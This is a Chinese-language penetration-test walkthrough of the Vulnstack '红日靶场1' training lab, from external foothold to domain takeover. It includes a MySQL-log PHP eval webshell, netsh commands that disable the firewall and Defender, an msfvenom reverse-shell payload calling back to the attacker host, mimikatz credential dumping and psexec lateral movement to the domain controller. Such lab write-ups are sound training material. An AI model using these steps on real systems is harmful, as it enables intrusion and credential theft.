红日靶场1

环境安装

官网下载:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

网络拓扑图

如果phpstudy出现问题了,看这边文章:https://blog.csdn.net/qq_43871179/article/details/125307581

开始打靶

外网打点

1
2
3
arp-scan -l

nmap -p 192.168.197.143

发现开启了80,3306,3389

访问80

泄露了相关的路径信息,服务版本信息等

然后进行dirsearch爆破一波

phpmyadmin

发现phpmyadmin,弱口令root/root进入了后台

1
2
3
4
发现了一张newyxcms的数据表
翻看了一下表解谜了admin的密码
949ba59abbe56e05
接下来查看了一下mysql的权限发现是root

尝试通过数据库into outfile写马然后getshell,发现失败

1
2
3
4
5
6
7
8
9
10
11
12
mysql   
	into写入文件:使用需看要secure_file_priv的值。
	value为“null”时,不允许读取任意文件
	value为其余路径时,表示该路径可以读写文件
	value为“空”时,允许读取任意文件

用show global variables like '%secure%' 命令查看

#####
修改value的值:
windows下修改配置文件:mysql.ini
linux修改配置文件:my.cnf
日志getshell
1
2
3
4
5
6
7
8
9
10
11
1.查看日志功能是否开启
show global variables like '%general%'
2.未开启的话设置为 on
set global general_log='ON'
3.开启后将日志文件的存储位置改为可访问到的目录, 根目录即可
set global  general_log_file = 'C:/phpStudy1/WWW/shell.php'
4.执行下边一句话木马 
数据库将会将查询语句保存在日志文件中
SELECT '<?php @eval($_POST["cmd"]); ?>'
5.写入成功后 使用蚁剑连接

YXCMS

因为我字典不够强大,没扫出来,只能getshell了看到了这个在来一次打点

这里直接给出了后台登录方式

进入后发现了该CMS的版本

1
2
https://qkl.seebug.org/appdir/YXcms
直接照着版本打
模板getshell

然后直接上蚁剑

内网搜集

1
2
3
4
查看了权限发现是system
然后看看是否有杀毒软件
tasklist
然后复制内容到https://saucer-man.com/avlist/index.html对比一下发现没有
1
ipconfig /all

发现了另外两个网络

1
2
3
netsh advfirewall show allprofile state(查看状态)
netsh advfirewall set allprofiles state off(关闭防火墙)
net stop defender(关闭defender)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
C:\phpStudy\WWW> systeminfo
主机名:           STU1
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          成员工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00371-177-0000061-85693
初始安装日期:     2019/8/25, 9:54:10
系统启动时间:     2023/9/11, 23:34:09
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 165 Stepping 2 GenuineIntel ~2400 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2020/11/12
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,184 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   3,117 MB
虚拟内存: 使用中: 978 MB
页面文件位置:     C:\pagefile.sys
:               god.org
登录服务器:       暂缺
修补程序:         安装了 4 个修补程序。
                  [01]: KB2534111
                  [02]: KB2999226
                  [03]: KB958488
                  [04]: KB976902
网卡:             安装了 6 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP: 
                      IP 地址
                        [01]: 192.168.52.143
                        [02]: fe80::bccf:c15a:dc63:5853
                  [02]: Bluetooth 设备(个人区域网)
                      连接名:      Bluetooth 网络连接
                      状态:        媒体连接已中断
                  [03]: TAP-Windows Adapter V9
                      连接名:      本地连接 2
                      状态:        媒体连接已中断
                  [04]: Microsoft Loopback Adapter
                      连接名:      Npcap Loopback Adapter
                      启用 DHCP: 
                      DHCP 服务器: 255.255.255.255
                      IP 地址
                        [01]: 169.254.129.186
                        [02]: fe80::b461:ccad:e30f:81ba
                  [05]: TAP-Windows Adapter V9
                      连接名:      本地连接 3
                      状态:        媒体连接已中断
                  [06]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接 5
                      启用 DHCP: 
                      DHCP 服务器: 192.168.197.254
                      IP 地址
                        [01]: 192.168.197.143
                        [02]: fe80::a123:5d41:1245:4d9a

这些看着不是很舒服,还是英文看着敏感一点,所以选择msf上线

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.197.142 LPORT=2222 -f exe -o shell.exe

然后msf开启监听

1
2
3
4
5
use exploit/mutli/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.197.142
set lport 2222
exploit

只要msf进行了监听,然后win7点击了木马就报错,一直弹不上

所以选择转到CS进行上线

1
2
CS开一个监听窗口
生成木马然后传到靶机进行上线

然后在蚁剑的终端执行该木马即可上线

然后interact

1
2
3
4
5
6
7
8
9
10
11
12
sleep 0(本地的靶机用sleep 0 无所谓)

shell whoami
->system

net config workstation  查看是否有域,以及当前登录域
net view 查看域内主机列表

查看域控:
net group "domain controllers" /domain 查看域控制器(如果有多台)
net user /domain 查看域内所有域用户 
net group "domain admins" /domain 查看域管理员列表

此时,结合以上已经知道了域控是OWA(192.168.52.138)

然后在无脑上一波fscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
start infoscan
(icmp) Target '192.168.52.138' is alive
(icmp) Target '192.168.52.141' is alive
(icmp) Target '192.168.52.143' is alive
icmp alive hosts len is: 3
192.168.52.138:445 open
192.168.52.143:139 open
192.168.52.141:21 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.143:445 open
192.168.52.141:445 open
192.168.52.141:139 open
192.168.52.138:139 open
192.168.52.143:135 open
192.168.52.138:135 open
192.168.52.143:80 open
192.168.52.138:80 open
192.168.52.138:88 open
192.168.52.141:7002 open
192.168.52.141:8099 open
192.168.52.141:8098 open
192.168.52.141:135 open

[09/20 03:05:57] [+] received output:
alive ports len is: 18
start vulscan
NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]192.168.52.143
   [->]169.254.129.186
   [->]192.168.197.143
[+] 192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] mysql:192.168.52.143:3306:root 123456
NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
[*] WebTitle:http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
[*] 192.168.52.143       GOD\STU1              Windows 7 Professional 7601 Service Pack 1
[+] 192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] 192.168.52.138 [+]DC GOD\OWA               Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] 192.168.52.141       __MSBROWSE__\SNTL_ROOT-TVI86   
[*] WebTitle:http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
[+] 192.168.52.141	MS17-010	(Windows Server 2003 3790)

[09/20 03:05:58] [+] received output:
[*] WebTitle:http://192.168.52.138     code:200 len:4      title:IIS7

[09/20 03:05:58] [+] received output:
[+] ftp://192.168.52.141:21:anonymous 

[09/20 03:05:58] [+] received output:
[*] WebTitle:http://192.168.52.143     code:200 len:21     title:phpStudy 鎺㈤拡 2014

[09/20 03:06:00] [+] received output:
宸插畬鎴� 21/21
scan end

发现了三台机子都有ms17_010,但是不一定100%打的成功

拿下域控

1
run mimikatz

结合net view的主机进行psexec

首先应该先建立一个smb的监听

然后进psexec,选择刚刚的smb监听,选择域控的账户密码

就会发现域控(OWA)上线

同时也可以让另外一台192.168.52.141上线

最终三台主机成功上线